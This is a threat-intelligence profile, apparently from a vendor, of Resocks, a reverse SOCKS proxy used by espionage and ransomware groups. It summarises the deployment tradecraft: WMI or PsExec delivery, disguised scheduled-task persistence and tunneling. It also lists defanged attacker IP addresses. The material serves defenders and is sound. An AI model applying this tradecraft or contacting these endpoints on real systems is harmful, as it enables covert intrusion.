Resocks
Resocks is a Go-based reverse proxy/SOCKS-style utility used by multiple threat clusters as a post-compromise access and tunneling tool. Reporting describes it as a readily accessible tool from GitHub that effectively turns a compromised host into a secure relay point. It has been observed packaged in password-protected RAR archives alongside other tunneling tools such as chisel, and deployed after initial compromise to provide proxy access, support remote command execution through relays, and facilitate lateral movement.
High-confidence reporting links Resocks to at least three distinct activity sets. Hydra Saiga (also tracked as Yorotrooper, ShadowSilk, and Silent Lynx), a suspected Kazakhstan-aligned espionage actor, used commodity tools including Resocks together with Telegram-based custom implants, Havoc, and Meterpreter while targeting government, energy, and critical infrastructure organizations across Central Asia, Europe, and the Middle East. In that activity, operators used WMI or PsExec to deploy a reverse SOCKS5 proxy client after domain discovery. Bitdefender also reported heavy use of Resocks by the Curly COMrades espionage cluster targeting judicial and government entities in Georgia and an energy distribution company in Moldova; it was the most frequently observed proxy tool in that campaign. Recovered samples were built with the Go obfuscation utility garble, commonly configured communications over port 443 and in one case 8443, and were persisted via scheduled tasks and Windows services named to resemble legitimate components. Observed Resocks endpoints in that reporting included 91.107.174[.]190, 96.30.124[.]103, 194.87.31[.]171, 75.127.13[.]136, 94.131.109[.]91, and 207.180.194[.]109. In one Moldova case, a Resocks client made an HTTP request to a Redmine server over port 3000 in Ukraine, assessed as a compromised relay. Kaspersky separately reported that the ransomware-linked groups Crypt Ghouls and MorLock used the same Resocks utility.
Overall, the tool is associated with covert network access, proxying, and relay functionality on compromised Windows environments, especially in hands-on-keyboard intrusions where operators need persistent internal access and traffic forwarding.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"...both Crypt Ghouls and MorLock used the same resocks utility..."
"...both Crypt Ghouls and MorLock used the same resocks utility..."
These tools were commonly packaged in password-protected RAR archives, and ranged from reverse proxy clients like resocks and tunnelling software like chisel...
Techniques & procedures
6 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueOpen-source tools: Neo-reGeorg, resocks, revsocks, patator
Execution
1 technique"used either Windows Management Instrumentation (WMI) or PsExec to download and execute a reverse socks5 proxy client"
Lateral Movement
1 technique"used either Windows Management Instrumentation (WMI) or PsExec"
Command and Control
3 techniquesMuddyWater was observed leveraging the Chinese-developed tool Neo-reGeorg to perform webshell-based SOCKS pivoting... Additionally, the tool resocks was used... Similarly, an alternative tool revsocks was also used
"tunnelling software like chisel"; "reverse socks5 proxy client"
IOCs tracked for this family
11 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
Other indicator types observed in public reporting.
Recent activity
4 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An open-source reverse SOCKS5 proxy used for pivoting/tunneling and maintaining operator connectivity during post-exploitation; Hydra Saiga used it for lateral movement and to establish proxy access back to their infrastructure.
Go-based proxy tool used as a relay/egress mechanism to route attacker traffic through compromised infrastructure.
Proxy/SOCKS utility used to route traffic and support covert connectivity during operations.
Open-source proxy/tunneling tool used to create SOCKS-style relay points inside victim networks, enabling attacker traffic routing and remote command execution through established tunnels; persisted via scheduled tasks/services and often retrieved/executed via curl.exe.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.